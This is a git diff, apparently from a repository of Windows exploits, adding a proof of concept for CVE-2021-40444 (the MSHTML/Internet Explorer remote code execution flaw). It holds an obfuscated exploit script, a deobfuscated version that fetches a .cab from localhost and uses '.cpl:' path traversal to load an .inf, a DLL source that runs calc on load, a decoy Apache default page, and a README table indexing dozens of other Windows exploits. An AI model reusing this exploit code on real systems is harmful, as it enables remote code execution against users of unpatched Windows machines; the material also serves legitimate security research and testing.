_0x487bfa='l';_0x126e83[_0x2ee207(0xeb)]('c'+'la'+_0x2ee207(0xab)+'d','CL'+'SI'+_0x2ee207(0xd2)),_0x1ee31c[_0x2ee207(0xb5)](_0xf70c6e[_0x2ee207(0xb3)]['document']['body'],_0x126e83),_0xfed1ef[_0x2ee207(0xb3)][_0x2ee207(0xb0)]='.'+_0xd7e33d+_0x371a71+_0x487bfa+':'+'123',_0xfed1ef[_0x2ee207(0xb3)]['location']='.'+_0xd7e33d+_0x371a71+_0x487bfa+':'+_0x2ee207(0xd9),_0xfed1ef[_0x2ee207(0xb3)][_0x2ee207(0xb0)]='.'+_0xd7e33d+_0x371a71+_0x487bfa+':'+_0x2ee207(0xd9),_0xfed1ef[_0x2ee207(0xb3)][_0x2ee207(0xb0)]='.'+_0xd7e33d+_0x371a71+_0x487bfa+':'+_0x2ee207(0xd9),_0xfed1ef[_0x2ee207(0xb3)][_0x2ee207(0xb0)]='.'+_0xd7e33d+_0x371a71+_0x487bfa+':'+'123',_0xfed1ef[_0x2ee207(0xb3)][_0x2ee207(0xb0)]='.'+_0xd7e33d+_0x371a71+_0x487bfa+':'+_0x2ee207(0xd9),_0xfed1ef['Script']['location']='.'+_0xd7e33d+_0x371a71+_0x487bfa+':'+_0x2ee207(0xd9),_0xfed1ef[_0x2ee207(0xb3)]['location']='.'+_0xd7e33d+_0x371a71+_0x487bfa+':'+_0x2ee207(0xd9),_0xfed1ef[_0x2ee207(0xb3)][_0x2ee207(0xb0)]='.'+_0xd7e33d+_0x371a71+_0x487bfa+':'+'123',_0xfed1ef[_0x2ee207(0xb3)][_0x2ee207(0xb0)]='.'+_0xd7e33d+_0x371a71+_0x487bfa+':'+'..'+'/.'+_0x2ee207(0xc5)+_0x2ee207(0xdf)+_0x2ee207(0xe7)+'Lo'+_0x2ee207(0xc8)+'T'+_0x2ee207(0xb7)+_0x2ee207(0xdc)+_0x2ee207(0xcb),_0x5f3191[_0x2ee207(0xb3)][_0x2ee207(0xb0)]='.'+_0xd7e33d+_0x371a71+_0x487bfa+':.'+'./'+'..'+'/.'+_0x2ee207(0xe6)+'pp'+_0x2ee207(0xe0)+'a/Lo'+'ca'+_0x2ee207(0xc7)+'em'+'p/msword.inf',_0xafc795[_0x2ee207(0xb3)][_0x2ee207(0xb0)]='.'+_0xd7e33d+_0x371a71+_0x487bfa+':'+'..'+_0x2ee207(0xd6)+'/.'+'./../A'+_0x2ee207(0xdf)+_0x2ee207(0xe7)+'Lo'+_0x2ee207(0xc8)+'T'+_0x2ee207(0xb7)+_0x2ee207(0xdc)+'w/msword.inf',_0x5a6d4b[_0x2ee207(0xb3)][_0x2ee207(0xb0)]='.'+_0xd7e33d+_0x371a71+_0x487bfa+':.'+'./'+_0x2ee207(0xe9)+'..'+'/.'+_0x2ee207(0xe6)+'pp'+'Dat'+_0x2ee207(0xb2)+'ca'+'l/T'+'em'+_0x2ee207(0xc3),_0x258443[_0x2ee207(0xb3)]['location']='.'+_0xd7e33d+_0x371a71+_0x487bfa+':'+'..'+_0x2ee207(0xd6)+'/.'+_0x2ee207(0xdd)+'T'+_0x2ee207(0xb7)+_0x2ee207(0xdc)+_0x2ee207(0xcb),_0x5a6d4b['Script'][_0x2ee207(0xb0)]='.'+_0xd7e33d+_0x371a71+_0x487bfa+':.'+'./'+'../'+'..'+'/.'+'./../T'+'em'+'p/msword.inf',_0x5a6d4b[_0x2ee207(0xb3)]['location']='.'+_0xd7e33d+_0x371a71+_0x487bfa+':'+_0x2ee207(0xe9)+_0x2ee207(0xe9)+_0x2ee207(0xbf),_0x5a6d4b[_0x2ee207(0xb3)]['location']='.'+_0xd7e33d+_0x371a71+_0x487bfa+':'+'../'+_0x2ee207(0xe9)+_0x2ee207(0xd0);}());
+  </script></body></html>
diff --git a/CVE-2021-40444/srv/calc.cab b/CVE-2021-40444/srv/calc.cab
new file mode 100644
index 0000000..5c9004e
Binary files /dev/null and b/CVE-2021-40444/srv/calc.cab differ
diff --git a/CVE-2021-40444/srv/deob.html b/CVE-2021-40444/srv/deob.html
new file mode 100644
index 0000000..493988b
--- /dev/null
+++ b/CVE-2021-40444/srv/deob.html
@@ -0,0 +1,70 @@
+<!DOCTYPE html>
+<html>
+    <head>
+        <meta http-equiv="Expires" content="-1">
+        <meta http-equiv="X-UA-Compatible" content="IE=11">
+    </head>
+    <body>
+        <script>
+            function garbage() {
+                return 'garbage';
+            }
+            (function exploit() {
+                var iframe = window["Document"]['prototype']['createElement']['call'](window["document"], 'iframe');
+                try {
+                    window["HTMLElement"]["prototype"]["appendChild"]['call'](window["document"]['body'], iframe);
+                } catch (_0x1ab454) {
+                    window["HTMLElement"]["prototype"]["appendChild"]['call'](window["document"]['documentElement'], iframe);
+                }
+                var htmlfile = iframe['contentWindow']['ActiveXObject']
+                  , htmlfile2 = new htmlfile('htmlfile');
+                iframe['contentDocument']['open']()['close']();
+                try {
+                    window["HTMLElement"]["prototype"]["removeChild"]['call'](window["document"]['body'], iframe);
+                } catch (_0x3b004e) {
+                    window["HTMLElement"]["prototype"]["removeChild"]['call'](window["document"]['documentElement'], iframe);
+                }
+                htmlfile2['open']()['close']();
+                var htmlfile3 = new htmlfile2[('Script')]['ActiveXObject']('htmlfile');
+                htmlfile3['open']()['close']();
+                var htmlfile4 = new htmlfile3[('Script')]['ActiveXObject']('htmlfile');
+                htmlfile4['open']()['close']();
+                var htmlfile5 = new htmlfile4[('Script')]['ActiveXObject']('htmlfile');
+                htmlfile5['open']()['close']();
+                var ActiveXObjectVAR = new ActiveXObject('htmlfile')
+                  , ActiveXObjectVAR2 = new ActiveXObject('htmlfile')
+                  , ActiveXObjectVAR3 = new ActiveXObject('htmlfile')
+                  , ActiveXObjectVAR4 = new ActiveXObject('htmlfile')
+                  , ActiveXObjectVAR5 = new ActiveXObject('htmlfile')
+                  , ActiveXObjectVAR6 = new ActiveXObject('htmlfile')
+                  , XMLHttpR = new window['XMLHttpRequest']()
+                  , XMLHttpRopen = window['XMLHttpRequest']['prototype']['open']
+                  , XMLHttpRsend = window['XMLHttpRequest']['prototype']['send'];
+                XMLHttpRopen['call'](XMLHttpR, 'GET', 'http://127.0.0.1/test.cab', ![]),
+                XMLHttpRsend['call'](XMLHttpR),
+                htmlfile5['Script']['document']['write']('body>');
+                var htmlScript = window["Document"]['prototype']['createElement']['call'](htmlfile5['Script']['document'], 'object');
+                htmlScript['setAttribute']('codebase', 'http://127.0.0.1/test.cab#version=5,0,0,0');
+                htmlScript['setAttribute']('CLSID:edbc374c-5730-432a-b5b8-de94f0b57217'),
+                window["HTMLElement"]["prototype"]["appendChild"]['call'](htmlfile5['Script']['document']['body'], htmlScript),
+                ActiveXObjectVAR['Script']['location'] = '.cpl:123',
+                ActiveXObjectVAR['Script']['location'] = '.cpl:123',
+                ActiveXObjectVAR['Script']['location'] = '.cpl:123',
+                ActiveXObjectVAR['Script']['location'] = '.cpl:123',
+                ActiveXObjectVAR['Script']['location'] = '.cpl:123',
+                ActiveXObjectVAR['Script']['location'] = '.cpl:123',
+                ActiveXObjectVAR['Script']['location'] = '.cpl:123',
+                ActiveXObjectVAR['Script']['location'] = '.cpl:123',
+                ActiveXObjectVAR['Script']['location'] = '.cpl:123',
+                ActiveXObjectVAR['Script']['location'] = '.cpl:../../../AppData/Local/Temp/Low/championship.inf',
+                ActiveXObjectVAR2['Script']['location'] = '.cpl:../../../AppData/Local/Temp/championship.inf',
+                ActiveXObjectVAR3['Script']['location'] = '.cpl:../../../../AppData/Local/Temp/Low/championship.inf',
+                ActiveXObjectVAR4['Script']['location'] = '.cpl:../../../../AppData/Local/Temp/championship.inf',
+                ActiveXObjectVAR5['Script']['location'] = '.cpl:../../../../../Temp/Low/championship.inf',
+                ActiveXObjectVAR4['Script']['location'] = '.cpl:../../../../../Temp/championship.inf',
+                ActiveXObjectVAR4['Script']['location'] = '.cpl:../../Low/championship.inf',
+                ActiveXObjectVAR4['Script']['location'] = '.cpl:../../championship.inf';
+            }());
+        </script>
+    </body>
+</html>
diff --git a/CVE-2021-40444/srv/index.html b/CVE-2021-40444/srv/index.html
new file mode 100644
index 0000000..eb0e7a0
--- /dev/null
+++ b/CVE-2021-40444/srv/index.html
@@ -0,0 +1,376 @@
+
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+<html xmlns="http://www.w3.org/1999/xhtml">
+  <!--
+    Modified from the Debian original for Ubuntu
+    Last updated: 2016-11-16
+    See: https://launchpad.net/bugs/1288690
+  -->
+  <head>
+    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
+    <title>Apache2 Ubuntu Default Page: It works</title>
+    <style type="text/css" media="screen">
+  * {
+    margin: 0px 0px 0px 0px;
+    padding: 0px 0px 0px 0px;
+  }
+
+  body, html {
+    padding: 3px 3px 3px 3px;
+
+    background-color: #D8DBE2;
+
+    font-family: Verdana, sans-serif;
+    font-size: 11pt;
+    text-align: center;
+  }
+
+  div.main_page {
+    position: relative;
+    display: table;
+
+    width: 800px;
+
+    margin-bottom: 3px;
+    margin-left: auto;
+    margin-right: auto;
+    padding: 0px 0px 0px 0px;
+
+    border-width: 2px;
+    border-color: #212738;
+    border-style: solid;
+
+    background-color: #FFFFFF;
+
+    text-align: center;
+  }
+
+  div.page_header {
+    height: 99px;
+    width: 100%;
+
+    background-color: #F5F6F7;
+  }
+
+  div.page_header span {
+    margin: 15px 0px 0px 50px;
+
+    font-size: 180%;
+    font-weight: bold;
+  }
+
+  div.page_header img {
+    margin: 3px 0px 0px 40px;
+
+    border: 0px 0px 0px;
+  }
+
+  div.table_of_contents {
+    clear: left;
+
+    min-width: 200px;
+
+    margin: 3px 3px 3px 3px;
+
+    background-color: #FFFFFF;
+
+    text-align: left;
+  }
+
+  div.table_of_contents_item {
+    clear: left;
+
+    width: 100%;
+
+    margin: 4px 0px 0px 0px;
+
+    background-color: #FFFFFF;
+
+    color: #000000;
+    text-align: left;
+  }
+
+  div.table_of_contents_item a {
+    margin: 6px 0px 0px 6px;
+  }
+
+  div.content_section {
+    margin: 3px 3px 3px 3px;
+
+    background-color: #FFFFFF;
+
+    text-align: left;
+  }
+
+  div.content_section_text {
+    padding: 4px 8px 4px 8px;
+
+    color: #000000;
+    font-size: 100%;
+  }
+
+  div.content_section_text pre {
+    margin: 8px 0px 8px 0px;
+    padding: 8px 8px 8px 8px;
+
+    border-width: 1px;
+    border-style: dotted;
+    border-color: #000000;
+
+    background-color: #F5F6F7;
+
+    font-style: italic;
+  }
+
+  div.content_section_text p {
+    margin-bottom: 6px;
+  }
+
+  div.content_section_text ul, div.content_section_text li {
+    padding: 4px 8px 4px 16px;
+  }
+
+  div.section_header {
+    padding: 3px 6px 3px 6px;
+
+    background-color: #8E9CB2;
+
+    color: #FFFFFF;
+    font-weight: bold;
+    font-size: 112%;
+    text-align: center;
+  }
+
+  div.section_header_red {
+    background-color: #CD214F;
+  }
+
+  div.section_header_grey {
+    background-color: #9F9386;
+  }
+
+  .floating_element {
+    position: relative;
+    float: left;
+  }
+
+  div.table_of_contents_item a,
+  div.content_section_text a {
+    text-decoration: none;
+    font-weight: bold;
+  }
+
+  div.table_of_contents_item a:link,
+  div.table_of_contents_item a:visited,
+  div.table_of_contents_item a:active {
+    color: #000000;
+  }
+
+  div.table_of_contents_item a:hover {
+    background-color: #000000;
+
+    color: #FFFFFF;
+  }
+
+  div.content_section_text a:link,
+  div.content_section_text a:visited,
+   div.content_section_text a:active {
+    background-color: #DCDFE6;
+
+    color: #000000;
+  }
+
+  div.content_section_text a:hover {
+    background-color: #000000;
+
+    color: #DCDFE6;
+  }
+
+  div.validator {
+  }
+    </style>
+  </head>
+  <body>
+    <div class="main_page">
+      <div class="page_header floating_element">
+        <img src="/icons/ubuntu-logo.png" alt="Ubuntu Logo" class="floating_element"/>
+        <span class="floating_element">
+          Apache2 Ubuntu Default Page
+        </span>
+      </div>
+<!--      <div class="table_of_contents floating_element">
+        <div class="section_header section_header_grey">
+          TABLE OF CONTENTS
+        </div>
+        <div class="table_of_contents_item floating_element">
+          <a href="#about">About</a>
+        </div>
+        <div class="table_of_contents_item floating_element">
+          <a href="#changes">Changes</a>
+        </div>
+        <div class="table_of_contents_item floating_element">
+          <a href="#scope">Scope</a>
+        </div>
+        <div class="table_of_contents_item floating_element">
+          <a href="#files">Config files</a>
+        </div>
+      </div>
+-->
+      <div class="content_section floating_element">
+
+
+        <div class="section_header section_header_red">
+          <div id="about"></div>
+          It works!
+        </div>
+        <div class="content_section_text">
+          <p>
+                This is the default welcome page used to test the correct 
+                operation of the Apache2 server after installation on Ubuntu systems.
+                It is based on the equivalent page on Debian, from which the Ubuntu Apache
+                packaging is derived.
+                If you can read this page, it means that the Apache HTTP server installed at
+                this site is working properly. You should <b>replace this file</b> (located at
+                <tt>/var/www/html/index.html</tt>) before continuing to operate your HTTP server.
+          </p>
+
+
+          <p>
+                If you are a normal user of this web site and don't know what this page is
+                about, this probably means that the site is currently unavailable due to
+                maintenance.
+                If the problem persists, please contact the site's administrator.
+          </p>
+
+        </div>
+        <div class="section_header">
+          <div id="changes"></div>
+                Configuration Overview
+        </div>
+        <div class="content_section_text">
+          <p>
+                Ubuntu's Apache2 default configuration is different from the
+                upstream default configuration, and split into several files optimized for
+                interaction with Ubuntu tools. The configuration system is
+                <b>fully documented in
+                /usr/share/doc/apache2/README.Debian.gz</b>. Refer to this for the full
+                documentation. Documentation for the web server itself can be
+                found by accessing the <a href="/manual">manual</a> if the <tt>apache2-doc</tt>
+                package was installed on this server.
+
+          </p>
+          <p>
+                The configuration layout for an Apache2 web server installation on Ubuntu systems is as follows:
+          </p>
+          <pre>
+/etc/apache2/
+|-- apache2.conf
+|       `--  ports.conf
+|-- mods-enabled
+|       |-- *.load
+|       `-- *.conf
+|-- conf-enabled
+|       `-- *.conf
+|-- sites-enabled
+|       `-- *.conf
+          </pre>
+          <ul>
+                        <li>
+                           <tt>apache2.conf</tt> is the main configuration
+                           file. It puts the pieces together by including all remaining configuration
+                           files when starting up the web server.
+                        </li>
+
+                        <li>
+                           <tt>ports.conf</tt> is always included from the
+                           main configuration file. It is used to determine the listening ports for
+                           incoming connections, and this file can be customized anytime.
+                        </li>
+
+                        <li>
+                           Configuration files in the <tt>mods-enabled/</tt>,
+                           <tt>conf-enabled/</tt> and <tt>sites-enabled/</tt> directories contain
+                           particular configuration snippets which manage modules, global configuration
+                           fragments, or virtual host configurations, respectively.
+                        </li>
+
+                        <li>
+                           They are activated by symlinking available
+                           configuration files from their respective
+                           *-available/ counterparts. These should be managed
+                           by using our helpers
+                           <tt>
+                                a2enmod,
+                                a2dismod,
+                           </tt>
+                           <tt>
+                                a2ensite,
+                                a2dissite,
+                            </tt>
+                                and
+                           <tt>
+                                a2enconf,
+                                a2disconf
+                           </tt>. See their respective man pages for detailed information.
+                        </li>
+
+                        <li>
+                           The binary is called apache2. Due to the use of
+                           environment variables, in the default configuration, apache2 needs to be
+                           started/stopped with <tt>/etc/init.d/apache2</tt> or <tt>apache2ctl</tt>.
+                           <b>Calling <tt>/usr/bin/apache2</tt> directly will not work</b> with the
+                           default configuration.
+                        </li>
+          </ul>
+        </div>
+
+        <div class="section_header">
+            <div id="docroot"></div>
+                Document Roots
+        </div>
+
+        <div class="content_section_text">
+            <p>
+                By default, Ubuntu does not allow access through the web browser to
+                <em>any</em> file apart of those located in <tt>/var/www</tt>,
+                <a href="http://httpd.apache.org/docs/2.4/mod/mod_userdir.html" rel="nofollow">public_html</a>
+                directories (when enabled) and <tt>/usr/share</tt> (for web
+                applications). If your site is using a web document root
+                located elsewhere (such as in <tt>/srv</tt>) you may need to whitelist your
+                document root directory in <tt>/etc/apache2/apache2.conf</tt>.
+            </p>
+            <p>
+                The default Ubuntu document root is <tt>/var/www/html</tt>. You
+                can make your own virtual hosts under /var/www. This is different
+                to previous releases which provides better security out of the box.
+            </p>
+        </div>
+
+        <div class="section_header">
+          <div id="bugs"></div>
+                Reporting Problems
+        </div>
+        <div class="content_section_text">
+          <p>
+                Please use the <tt>ubuntu-bug</tt> tool to report bugs in the
+                Apache2 package with Ubuntu. However, check <a
+                href="https://bugs.launchpad.net/ubuntu/+source/apache2"
+                rel="nofollow">existing bug reports</a> before reporting a new bug.
+          </p>
+          <p>
+                Please report bugs specific to modules (such as PHP and others)
+                to respective packages, not to the web server itself.
+          </p>
+        </div>
+
+
+
+
+      </div>
+    </div>
+    <div class="validator">
+    </div>
+  </body>
+</html>
+
+
diff --git a/CVE-2021-40444/test/calc.c b/CVE-2021-40444/test/calc.c
new file mode 100644
index 0000000..6dc92fa
--- /dev/null
+++ b/CVE-2021-40444/test/calc.c
@@ -0,0 +1,29 @@
+#include <windows.h>
+
+void exec(void) {
+	system("cmd /c calc");
+	return;
+}
+
+BOOL WINAPI DllMain(
+    HINSTANCE hinstDLL,
+    DWORD fdwReason, 
+    LPVOID lpReserved )
+{
+    switch( fdwReason ) 
+    { 
+        case DLL_PROCESS_ATTACH:
+           exec(); 
+           break;
+
+        case DLL_THREAD_ATTACH:
+            break;
+
+        case DLL_THREAD_DETACH:
+            break;
+
+        case DLL_PROCESS_DETACH:
+            break;
+    }
+    return TRUE;
+}
\ No newline at end of file
diff --git a/CVE-2021-40444/test/calc.dll b/CVE-2021-40444/test/calc.dll
new file mode 100644
index 0000000..1052d17
Binary files /dev/null and b/CVE-2021-40444/test/calc.dll differ
diff --git a/README.CN.md b/README.CN.md
index 3c8af58..261ef2e 100644
--- a/README.CN.md
+++ b/README.CN.md
@@ -31,91 +31,92 @@ http://kernelhub.ascotbe.com
 
 > 编号列表
 
-| SecurityBulletin                               |                         Description                          |               OperatingSystem               |
-| :--------------------------------------------- | :----------------------------------------------------------: | :-----------------------------------------: |
-| [CVE-2021-36934](./CVE-2021-36934)             |                      Windows Elevation                       |                 Windows 10                  |
-| [CVE-2021-33739](./CVE-2021-33739)             |             Microsoft DWM Core Library Elevation             |              Windows 10/Server              |
-| [CVE-2021-26868](./CVE-2021-33739)             |             Windows Graphics Component Elevation             |    Windows 8.1/10/2012/2016/2019/Server     |
-| [CVE-2021-1732](./CVE-2021-1732)               |                        Windows Win32k                        |           Windows 10/2019/Server            |
-| [CVE-2021-1709](./TestFailure/CVE-2021-1709)   |                        Windows Win32k                        | Windows 7/8.1/10/2008/2012/2016/2019/Server |
-| [CVE-2020-17087](./TestFailure/CVE-2020-17087) |         Windows Kernel Local Elevation of Privilege          | Windows 7/8.1/10/2008/2012/2016/2019/Server |
-| [CVE-2020-16938](./CVE-2020-16938)             |            Windows Kernel Information Disclosure             |               Windows Server                |
-| [CVE-2020-16898](./CVE-2020-16898)             |             Windows TCP/IP Remote Code Execution             |           Windows 10/2019/Server            |
-| [CVE-2020-1337](./CVE-2020-1337)               |               Windows Print Spooler Elevation                | Windows 7/8.1/10/2008/2012/2016/2019/Server |
-| [CVE-2020-1313](./CVE-2020-1313)               |        Windows Update Orchestrator Service Elevation         |              Windows 10/Server              |
-| [CVE-2020-1066](./CVE-2020-1066)               |                   .NET Framework Elevation                   |               Windows 7/2008                |
-| [CVE-2020-1015](./CVE-2020-1015)               |                Windows Elevation of Privilege                | Windows 7/8.1/10/2008/2012/2016/2019/Server |
-| [CVE-2020-1054](./CVE-2020-1054)               |                Win32k Elevation of Privilege                 | Windows 7/8.1/10/2008/2012/2016/2019/Server |
-| [CVE-2020-1472](./CVE-2020-1472)               |               Netlogon Elevation of Privilege                |     Windows 2008/2012/2016/2019/Server      |
-| [CVE-2020-0668](./CVE-2020-0668)               |            Windows Kernel Elevation of Privilege             | Windows 7/8.1/10/2008/2012/2016/2019/Serve  |
-| [CVE-2020-0683](./CVE-2020-0683)               |           Windows Installer Elevation of Privilege           | Windows 7/8.1/10/2008/2012/2016/2019/Server |
-| [CVE-2020-0796](./CVE-2020-0796)               |                 SMBv3 Remote Code Execution                  |               Windows Server                |
-| [CVE-2020-0787](./CVE-2020-0787)               |       Windows Background Intelligent Transfer Service        |     Windows 7/8/10/2008/2012/2016/2019      |
-| [CVE-2019-0808](.CVE-2019-0808)                |                Win32k Elevation of Privilege                 |               Windows 7/2008                |
-| [CVE-2019-0623](.CVE-2019-0808)                |                Win32k Elevation of Privilege                 |    Windows 7/8.1/10/2008/2012/2016/Serve    |
-| [CVE-2019-1458](./CVE-2019-1458)               |                Win32k Elevation of Privilege                 |        Windows 7/8/10/2008/2012/2016        |
-| [CVE-2019-1388](./CVE-2019-1388)               |      Windows Certificate Dialog Elevation of Privilege       |       Windows 7/8/2008/2012/2016/2019       |
-| [CVE-2019-0859](./TestFailure/)                |                Win32k Elevation of Privilege                 |     Windows 7/8/10/2008/2012/2016/2019      |
-| [CVE-2019-0803](./CVE-2019-0803)               |                Win32k Elevation of Privilege                 |     Windows 7/8/10/2008/2012/2016/2019      |
-| [CVE-2018-8639](./CVE-2018-8639)               |                Win32k Elevation of Privilege                 |     Windows 7/8/10/2008/2012/2016/2019      |
-| [CVE-2018-8453](./CVE-2018-8453)               |                Win32k Elevation of Privilege                 |     Windows 7/8/10/2008/2012/2016/2019      |
-| [CVE-2018-8440](./TestFailure/CVE-2018-8440)   |             Windows ALPC Elevation of Privilege              |        Windows 7/8/10/2008/2012/2016        |
-| [CVE-2018-8120](./CVE-2018-8120)               |                Win32k Elevation of Privilege                 |               Windows 7/2008                |
-| [CVE-2018-1038](./TestFailure/CVE-2018-1038)   |            Windows Kernel Elevation of Privilege             |               Windows 7/2008                |
-| [CVE-2018-0743](./TestFailure/CVE-2018-0743)   |      Windows Subsystem for Linux Elevation of Privilege      |               Windows 10/2016               |
-| [CVE-2018-0833](./CVE-2018-0833)               |       SMBv3 Null Pointer Dereference Denial of Service       |               Windows 8/2012                |
-| [CVE-2017-8464](./CVE-2017-8464)               |                  LNK Remote Code Execution                   |        Windows 7/8/10/2008/2012/2016        |
-| [CVE-2017-0213](./CVE-2017-0213)               |              Windows COM Elevation of Privilege              |        Windows 7/8/10/2008/2012/2016        |
-| [CVE-2017-0143](./CVE-2017-0143)               |                 Windows Kernel Mode Drivers                  |     Windows 7/8/10/2008/2012/2016/Vista     |
-| [CVE-2017-0101](./CVE-2017-0101)               |        GDI Palette Objects Local Privilege Escalation        |       Windows 7/8/10/2008/2012/Vista        |
-| [CVE-2016-7255](./CVE-2016-7255)               |                 Windows Kernel Mode Drivers                  |     Windows 7/8/10/2008/2012/2016/Vista     |
-| [CVE-2016-3371](./CVE-2016-3371)               |            Windows Kernel Elevation of Privilege             |       Windows 7/8/10/2008/2012/Vista        |
-| [CVE-2016-3309](./TestFailure/CVE-2016-3309)   |                Win32k Elevation of Privilege                 |       Windows 7/8/10/2008/2012/Vista        |
-| [CVE-2016-3225](./CVE-2016-3225)               |          Windows SMB Server Elevation of Privilege           |       Windows 7/8/10/2008/2012/Vista        |
-| [CVE-2016-0099](./CVE-2016-0099)               |                    Secondary Logon Handle                    |       Windows 7/8/10/2008/2012/Vista        |
-| [CVE-2016-0095](./CVE-2016-0095)               |                Win32k Elevation of Privilege                 |       Windows 7/8/10/2008/2012/Vista        |
-| [CVE-2016-0051](./CVE-2016-0051)               |                WebDAV Elevation of Privilege                 |       Windows 7/8/10/2008/2012/Vista        |
-| [CVE-2016-0041](./CVE-2016-0041)               |       Win32k Memory Corruption Elevation of Privilege        |       Windows 7/8/10/2008/2012/Vista        |
-| [CVE-2015-2546](./CVE-2015-2546)               |       Win32k Memory Corruption Elevation of Privilege        |       Windows 7/8/10/2008/2012/Vista        |
-| [CVE-2015-2387](./CVE-2015-2387)               |                 ATMFD.DLL Memory Corruption                  |     Windows 7/8/2003/2008/2012/Vista/Rt     |
-| [CVE-2015-2370](./CVE-2015-2370)               |              Windows RPC Elevation of Privilege              |     Windows 7/8/10/2003/2008/2012/Vista     |
-| [CVE-2015-1725](./TestFailure/CVE-2015-1725)   |                Win32k Elevation of Privilege                 |     Windows 7/8/10/2003/2008/2012/Vista     |
-| [CVE-2015-1701](./CVE-2015-1701)               |                 Windows Kernel Mode Drivers                  |          Windows 7/2003/2008/Vista          |
-| [CVE-2015-0062](./TestFailure/CVE-2015-0062)   |        Windows Create Process Elevation of Privilege         |            Windows 7/8/2008/2012            |
-| [CVE-2015-0057](./CVE-2015-0057)               |                Win32k Elevation of Privilege                 |      Windows 7/8/2003/2008/2012/Vista       |
-| [CVE-2015-0003](./CVE-2015-0003)               |                Win32k Elevation of Privilege                 |      Windows 7/8/2003/2008/2012/Vista       |
-| [CVE-2015-0002](./TestFailure/CVE-2015-0002)   | Microsoft Application Compatibility Infrastructure Elevation of Privilege |         Windows 7/8/2003/2008/2012          |
-| [CVE-2014-6324](./TestFailure/CVE-2014-6324)   |               Kerberos Checksum Vulnerability                |      Windows 7/8/2003/2008/2012/Vista       |
-| [CVE-2014-6321](./TestFailure/CVE-2014-6321)   |           Microsoft Schannel Remote Code Execution           |      Windows 7/8/2003/2008/2012/Vista       |
-| [CVE-2014-4113](./CVE-2014-4113)               |              Win32k.sys Elevation of Privilege               |      Windows 7/8/2003/2008/2012/Vista       |
-| [CVE-2014-4076](./CVE-2014-4076)               |                TCP/IP Elevation of Privilege                 |                Windows 2003                 |
-| [CVE-2014-1767](./CVE-2014-1767)               |       Ancillary Function Driver Elevation of Privilege       |      Windows 7/8/2003/2008/2012/Vista       |
-| [CVE-2013-5065](./TestFailure/CVE-2013-5065)   |                         NDProxy.sys                          |               Windows XP/2003               |
-| [CVE-2013-1345](./CVE-2013-1345)               |                        Kernel Driver                         |   Windows 7/8/2003/2008/2012/Vista/Rt/Xp    |
-| [CVE-2013-1332](./CVE-2013-1332)               |        DirectX Graphics Kernel Subsystem Double Fetch        |     Windows 7/8/2003/2008/2012/Vista/Rt     |
-| [CVE-2013-0008](./TestFailure/CVE-2013-0008)   |               Win32k Improper Message Handling               |       Windows 7/8/2008/2012/Vista/Rt        |
-| [CVE-2012-0217](./CVE-2012-0217)               |                         Service Bus                          |           Windows 7/2003/2008/Xp            |
-| [CVE-2012-0002](./TestFailure/CVE-2012-0002)   |                   Remote Desktop Protocol                    |        Windows 7/2003/2008/Vista/Xp         |
-| [CVE-2011-2005](./CVE-2011-2005)               |       Ancillary Function Driver Elevation of Privilege       |               Windows 2003/Xp               |
-| [CVE-2011-1974](./CVE-2011-1974)               |               NDISTAPI Elevation of Privilege                |               Windows 2003/Xp               |
-| [CVE-2011-1249](./CVE-2011-1249)               |       Ancillary Function Driver Elevation of Privilege       |        Windows 7/2003/2008/Vista/Xp         |
-| [CVE-2011-0045](./TestFailure/CVE-2011-0045)   |              Windows Kernel Integer Truncation               |                 Windows Xp                  |
-| [CVE-2010-4398](./CVE-2010-4398)               |       Driver Improper Interaction with Windows Kernel        |        Windows 7/2003/2008/Vista/Xp         |
-| [CVE-2010-3338](./CVE-2010-3338)               |                        Task Scheduler                        |            Windows 7/2008/Vista             |
-| [CVE-2010-2554](./TestFailure/CVE-2010-2554)   |                   Tracing Registry Key ACL                   |            Windows 7/2008/Vista             |
-| [CVE-2010-1897](./CVE-2010-1897)               |                    Win32k Window Creation                    |        Windows 7/2003/2008/Vista/Xp         |
-| [CVE-2010-0270](./CVE-2010-0270)               |                    SMB Client Transaction                    |               Windows 7/2008                |
-| [CVE-2010-0233](./CVE-2010-0233)               |                  Windows Kernel Double Free                  |       Windows 2000/2003/2008/Vista/Xp       |
-| [CVE-2010-0020](./TestFailure/CVE-2010-0020)   |                    SMB Pathname Overflow                     |      Windows 7/2000/2003/2008/Vista/Xp      |
-| [CVE-2009-2532](./CVE-2009-2532)               |                     SMBv2 Command Value                      |             Windows 2008/Vista              |
-| [CVE-2009-0079](./TestFailure/CVE-2009-0079)   |               Windows RPCSS Service Isolation                |               Windows 2003/Xp               |
-| [CVE-2008-4250](./CVE-2008-4250)               |                        Server Service                        |         Windows 2000/2003/Vista/Xp          |
-| [CVE-2008-4037](./CVE-2008-4037)               |                  SMB Credential Reflection                   |       Windows 2000/2003/2008/Vista/Xp       |
-| [CVE-2008-3464](./CVE-2008-3464)               |                     AFD Kernel Overwrite                     |               Windows 2003/Xp               |
-| [CVE-2008-1084](./CVE-2008-1084)               |                          Win32.sys                           |       Windows 2000/2003/2008/Vista/Xp       |
-| [CVE-2006-3439](./CVE-2006-3439)               |                    Remote Code Execution                     |            Windows 2000/2003/Xp             |
-| [CVE-2005-1983](./TestFailure/CVE-2005-1983)   |                         PnP Service                          |               Windows 2000/Xp               |
-| [CVE-2003-0352](./CVE-2003-0352)               |               Buffer Overrun In RPC Interface                |           Windows 2000/2003/Xp/Nt           |
+| SecurityBulletin                               |                         Description                          |                 OperatingSystem                  |
+| :--------------------------------------------- | :----------------------------------------------------------: | :----------------------------------------------: |
+| [CVE-2021-40444](./CVE-2021-40444)             |                        Windows IE RCE                        | Windows 7/8.1/10/2008/2012/2016/2019/2022/Server |
+| [CVE-2021-36934](./CVE-2021-36934)             |                      Windows Elevation                       |                    Windows 10                    |
+| [CVE-2021-33739](./CVE-2021-33739)             |             Microsoft DWM Core Library Elevation             |                Windows 10/Server                 |
+| [CVE-2021-26868](./CVE-2021-33739)             |             Windows Graphics Component Elevation             |       Windows 8.1/10/2012/2016/2019/Server       |
+| [CVE-2021-1732](./CVE-2021-1732)               |                        Windows Win32k                        |              Windows 10/2019/Server              |
+| [CVE-2021-1709](./TestFailure/CVE-2021-1709)   |                        Windows Win32k                        |   Windows 7/8.1/10/2008/2012/2016/2019/Server    |
+| [CVE-2020-17087](./TestFailure/CVE-2020-17087) |         Windows Kernel Local Elevation of Privilege          |   Windows 7/8.1/10/2008/2012/2016/2019/Server    |
